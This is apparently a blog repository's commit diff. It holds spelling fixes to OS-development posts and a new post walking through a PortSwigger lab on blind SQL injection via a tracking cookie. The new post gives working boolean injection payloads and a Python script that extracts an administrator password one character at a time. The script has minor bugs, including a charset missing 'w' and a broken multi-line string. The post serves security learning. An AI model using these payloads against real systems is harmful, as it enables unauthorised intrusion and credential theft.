Fix spelling errors in first posts (yikes).

Blind SQL Injection Post
2024-01-23 23:14:03 -08:00 · 2024-01-23 23:08:02 -08:00
3 changed files with 243 additions and 17 deletions
--- a/content/blog/2023/12/acadia-0.1.0/index.md
+++ b/content/blog/2023/12/acadia-0.1.0/index.md
@ -111,13 +111,14 @@ On top of the things mentioned above, we use the limine protocol to:
 Following boot we immediately initialize the global descriptor table (GDT) and
 interrupt descriptor table (IDT). The **GDT** is mostly irrelevant for x86-64,
 however it was interesting trying to get it to work with the sysret function
-which expects two copies of the user-space segment descriptors to allow returing
-to 32bit code from a 64 bit OS. Right now the system doesn't support 32 bit code
-(and likely never will) so we just duplicate the 64 bit code segment.
+which expects two copies of the user-space segment descriptors to allow
+returning to 32bit code from a 64 bit OS. Right now the system doesn't support
+32 bit code (and likely never will) so we just duplicate the 64 bit code
+segment.

 The **IDT** is fairly straightforward and barebones for now. I slowly add more
 debugging information to faults as I run into them and it is useful. One of the
-biggest improvements was setting up a seperate kernel stack for Page Faults and
+biggest improvements was setting up a separate kernel stack for Page Faults and
 General Protection Faults. That way if I broke memory related to the current
 stack frame I get useful debugging information rather than an immediate triple
 fault. I also recently added some very sloppy stack unwind code so I can more
@ -153,9 +154,9 @@ earlier than they need to be it is obvious because things break.

 For **virtual memory management** I keep the higher half (kernel) mappings
 identical in each address space. Most of the kernel mappings are already
-availble from the bootloader but some are added for heaps and additional stacks.
+available from the bootloader but some are added for heaps and additional stacks.
 For user memory we maintain a tree of the mapped in objects to ensure that none
-intersect. Right now the tree is innefficient because it doesn't self balance
+intersect. Right now the tree is inefficient because it doesn't self balance
 and most objects are inserted in ascending order (i.e. it is essentially a
 linked list).

@ -213,7 +214,7 @@ The kernel provides APIs to:
 * Allocate memory and map it into an address space.
 * Communicate with other processes using Endpoints, Ports, and Channels.
 * Register IRQ handlers.
-* Manage Capabilites.
+* Manage Capabilities.
 * Print debug information to the VM output.

 ### IPC
--- a/content/blog/2024/01/ahci-driver/index.md
+++ b/content/blog/2024/01/ahci-driver/index.md
@ -110,7 +110,7 @@ The short story is that we are looking for the device with the right [class
 code](https://wiki.osdev.org/PCI#Class_Codes) - Class Code 0x1 (Storage Device),
 Subclass 0x6 (SATA Controller), Subtype 0x1 (AHCI).

-Once we have the correct configuration space we cn read the address at offset
+Once we have the correct configuration space we can read the address at offset
 0x24 (called the ABAR for AHCI Base Address) which points to the start of the
 GHC registers.

@ -319,7 +319,7 @@ type and any errors from the interrupt since we aren't sending any commands.

 Something I'm not sure about is that as soon as we enable interrupts we seem to
 receive a FIS from the device with an error bit set. Both the hard drive and the
-optical drive on qemu send a FIS with error bit 0x1 set. Additionally the status
+optical drive on QEMU send a FIS with error bit 0x1 set. Additionally the status
 field is set to 0x30 for the hard drive and 0x70 for the optical drive. 

 I was able to find a [OSDev Forum
@ -328,7 +328,7 @@ referencing that this behavior is caused by the reset sending an EXECUTE DEVICE
 DIAGNOSTIC command (0x90) to the device. It notes that this is largely
 undocumented behavior but at least this information offers some clarity on the
 outputs. Reading the ATA Command Set section 7.9.4 we can see that the command
-ouputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
+outputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
 present`. According a footnote we can "See the appropriate transport standard
 for the definition of device 0 and device 1." I really thought I was already
 looking at the "appropriate transport standard" but alas. All that to say we'll
@ -340,7 +340,7 @@ Now that the AHCI ports are initialized and can handle an interrupt, we can send
 commands to them. To start with lets send the IDENTIFY DEVICE command to each
 device. This command asks the device to send 512 bytes of information about
 itself back to us. These bytes contain 40 years of certified-crufty backwards
-compatability. I mean just feast your eyes on the number of retired and obsolete
+compatibility. I mean just feast your eyes on the number of retired and obsolete
 fields in just the first page of the spec.

 ![IDENTIFY DEVICE Response](images/IDENTIFY_DEVICE.png)
@ -350,7 +350,7 @@ and sector count from the drive. To do so we need to figure out how to send a
 command to the device. To be honest I feel like the specs fall down here in
 actually explaining this. The trick is to send a Register Host to Device FIS in one
 of the command slots. This FIS type has a field for the command as well as some
-common parameters such as lba and count. In retrospect it is fairly clear once
+common parameters such as LBA and count. In retrospect it is fairly clear once
 you are aware of it, but if you are just reading the SATA spec and looking at
 the possible commands, making the logical jump to the Register Host To Device
 FIS feels damn near impossible.
@ -379,7 +379,7 @@ Device FIS is as follows:
 ![Register Host to Device FIS Layout](images/RegisterHostToDeviceFIS.png)    

 We don't need to initialize most of the fields here because the IDENTIFY_DEVICE
-call doesn't rely on an lba or sector count. One of the keys is setting the high
+call doesn't rely on an LBA or sector count. One of the keys is setting the high
 bit "C" in the byte that contains PM Port which indicates to the HBA that this
 FIS contains a new command (I spent a while trying to figure out why this wasn't
 working without that). The code for this is relatively straightforward.
@ -429,9 +429,9 @@ port_struct_->command_issue |= (1 << slot);
 ```

 But wait! How will we know when this command has completed? We somehow need to
-wait until we receive an interrupt for this command to proccess the data it
+wait until we receive an interrupt for this command to process the data it
 sent. To handle this we can add a semaphore for each port command slot to allow
-signalling when we recieve a completion interrupt for that command. I think it
+signalling when we receive a completion interrupt for that command. I think it
 might make sense to have some sort of callback instead so we can pass errors
 back to the caller instead of just a completion signal. However I'm not sure
 what type of errors exist that are resolvable by the caller so for now this
@ -469,7 +469,7 @@ void AhciPort::HandleIrq() {
 }
 ```

-Ok now that we have retrieved the information from the drive we can parse it.
+OK now that we have retrieved the information from the drive we can parse it.
 For the sector size, the default is 512 bytes which we will use unless the
 `LOGICAL SECTOR SIZE SUPPORTED` bit is set in double word 106, bit 12. If that
 is set we can check the double words at 117 and 118 to get the 32 bit sector
@ -531,7 +531,7 @@ that truly only a mother could love:

 ![Register Host to Device Layout LBA](images/RegisterHostToDeviceFISLBA.png)

-That asside we simply update the FIS construction to set the command, LBA, and
+That aside we simply update the FIS construction to set the command, LBA, and
 sector count. Following that we set the PRDT values (although we still only use
 one slot).

--- a/content/blog/2024/01/blind-sqli-automation/index.md
+++ b/content/blog/2024/01/blind-sqli-automation/index.md
@ -0,0 +1,225 @@
+---
+title: "Automating Blind SQL Injection on Cookies"
+date: 2024-01-23
+---
+
+Earlier this evening, I was working through one of the [PortSwigger SQL
+injection
+labs](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)
+which requires you to determine an administrator password by injecting some SQL
+into a cookie and checking if the content of the page changes because a
+resulting query succeeded or failed.
+
+## The attack
+
+Basically say you have a cookie `TrackingId` with a value like
+`nCoQWoq8E7c6vj1e` and the page runs a query like `SELECT ... FROM trackers
+WHERE id = 'nCoQWoq8E7c6vj1o'` and inserts a "Welcome Back" banner onto the page
+if the query succeeds and doesn't if it fails.
+
+This means you can get creative with the value of the cookie to do some SQL
+injection and use the boolean output (either the banner displays or it doesn't)
+to extract information.
+
+To validate that there is a SQL injection path available you can try the
+following two values for the cookie:
+
+```markdown
+nCoQWoq8E7c6vj1o' AND '1'='1
+nCoQWoq8E7c6vj1o' AND '1'='0
+```
+
+This transforms the query from something like this:
+
+```sql
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o';
+```
+
+Into your modified query:
+
+```sql
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND '1'='0';
+```
+
+Now this might not seem very useful off the bat but you can extract a lot of
+information out of the database this way. Consider the following query.
+
+```sql
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND
+  (SELECT password FROM users WHERE username = 'administrator') = 'hunter2';
+```
+
+Now if the "Welcome Back" banner displayed on the site you would know that you
+had properly guessed the admin password because the condition evaluated to true.
+Now this isn't any more helpful than just trying to brute force the password on
+the login page (other than maybe just bypassing some rate-limits and monitoring).
+But what you can do to speed this up is to try to guess each letter at a time,
+and you can bifurcate while you're at it. Consider the following three queries
+(borrowed directly from the [PortSwigger
+tutorial](https://portswigger.net/web-security/sql-injection/blind)).
+
+```sql
+-- This succeeds
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
+  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm';
+
+-- This fails
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
+  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't';
+ 
+-- This succeeds
+SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
+  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's';
+```
+
+We now know the first letter of the administrator password is 's'!
+
+Looking directly at the cookie values they were as follows:
+
+```markdown
+nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm
+nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't
+nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
+```
+
+This is a pretty nifty attack that lets us systematically derive the
+administrators password.
+
+## The Problem
+
+Happily, I got to work on the lab and started bifurcating each letter of the
+administrator's password. The issue was by the time I got done doing this for 5
+letters in the password I was desperately hoping it was only 5 characters long.
+I had the same thoughts 8 characters, 10 characters, and 16 characters. This
+process was incredibly tedious and involved refreshing the page, updating the
+cookie info based on what I had just learned, saving the cookie, and refreshing
+the page again.
+
+Obviously there had to be a better way, but because I kept feeling like I was
+just around the corner from cracking it I ended up powering through all 20
+characters of the password. 20! This took me well over 30 minutes I think.
+
+Clearly, this sort of repetitive work is something that should be automated.
+
+## The Solution
+
+So let's take a crack at this using the python requests library (mainly because
+it is the one I've used in the past). Let's start by simply getting the page as
+is:
+
+```python
+import requests
+url = "https://{SOME_HEX_ID}.web-security-academy.net/"
+r = requests.get(url)
+print(r.status_code)
+print(r.text)
+```
+
+And viola it works! At least we don't have to pretend we're a browser or
+something to get the page properly. Next up lets try to get the "Welcome Back!"
+banner.
+
+```python
+cookies = {
+    "TrackingId": "CjAZljYSS9X1ZfRg",
+}
+r = requests.get(url, cookies=cookies)
+```
+
+Incredibly this also works on the first try! Now let's generalize this into a
+function that tells us whether a specific cookie gets a good response or not.
+
+```python
+def injection_works(inject_str):
+    url = "https://0a0400cc04bd096f82089e9e005900a9.web-security-academy.net/"
+    cookies = {
+        "TrackingId": f"CjAZljYSS9X1ZfRg{inject_str}",
+    }
+    r = requests.get(url, cookies=cookies)
+    if r.status_code != 200:
+        print(r.status_code)
+        print(r.text)
+        sys.exit("Request failed")
+    return "Welcome back!" in r.text
+
+
+if __name__ == "__main__":
+    print(injection_works(""))
+```
+
+For the purposes of this we can just match the exact string in the response
+text, we don't need to actually parse it using beautiful soup or something.
+
+Now we can use this function to bisect the first character like so:
+
+```python
+def determine_character(char_num):
+    base_inj_str = "' AND SUBSTRING("
+                   "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
+    # There has got to be a cleaner way to do this right?
+    base_charset = "0123456789abcdefghijklmnopqrstuvxyz"
+    charset = base_charset[:]
+    while len(charset) > 1:
+        mid_char_num = int(len(charset) / 2)
+        mid_char = charset[mid_char_num]
+        inj_str = base_inj_str.format(char_num, mid_char)
+        if injection_works(inj_str):
+            # The character is less than our midpoint.
+            charset = charset[:mid_char_num]
+        else:
+            # The character is greater than or equal to our midpoint.
+            charset = charset[mid_char_num:]
+        time.sleep(1)
+        print(charset)
+    return charset[0]
+
+if __name__ == "__main__":
+    print(determine_character(1))
+```
+
+This successfully identifies the first character in the administrator password as
+'1'.
+
+Finally we just need to do this iteratively until we reach the end of the
+password. While doing this manually I learned that when you take a substring
+outside of a strings length in MySQL it just returns an empty string. Lets add a
+case to detect that before trying to bifurcate a character, because as I
+learned annoyingly the first time around, the empty string will always compare
+as less than a single character. We can use that to our advantage however and
+simply test that whether the string is less than a character we know we won't
+see (as we know the password is lowercase alphanumeric) like the '!'.
+
+```python
+def determine_character(char_num):
+    base_inj_str = "' AND SUBSTRING("
+                   "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
+    base_charset = "0123456789abcdefghijklmnopqrstuvxyz"
+    if injection_works(base_inj_str.format(char_num, '!')):
+        return None
+    ...
+```
+
+Then in the main function we can use an [assignment
+expression](https://peps.python.org/pep-0572/) to loop until the function
+returns None.
+
+```python
+if __name__ == "__main__":
+    char_num = 1
+    password = ""
+    while char := determine_character(char_num):
+        password += char
+        char_num += 1
+    print(password)
+```
+
+And this worked on the first try! It got the password in around 3 minutes
+(mainly hampered by the slow response time of the server but I didn't want to
+hammer the kind people at PortSwagger by parallelizing this). And all told this
+took me just over 50 minutes to write (including this blog post though). And
+while that was slightly longer than the time it took me to do this manually it
+was wayyyy less tedious and it's repeatable!
+
+Overall, I found this very enjoyable as I have played with SQL injections in the
+past but I haven't tried to automate anything around it and this was a cool
+opportunity to do that.
Author	SHA1	Message	Date
Drew Galbraith	80e734855c	Fix spelling errors in first posts (yikes).	2024-01-23 23:14:03 -08:00
Drew Galbraith	adeb3cf394	Blind SQL Injection Post	2024-01-23 23:08:02 -08:00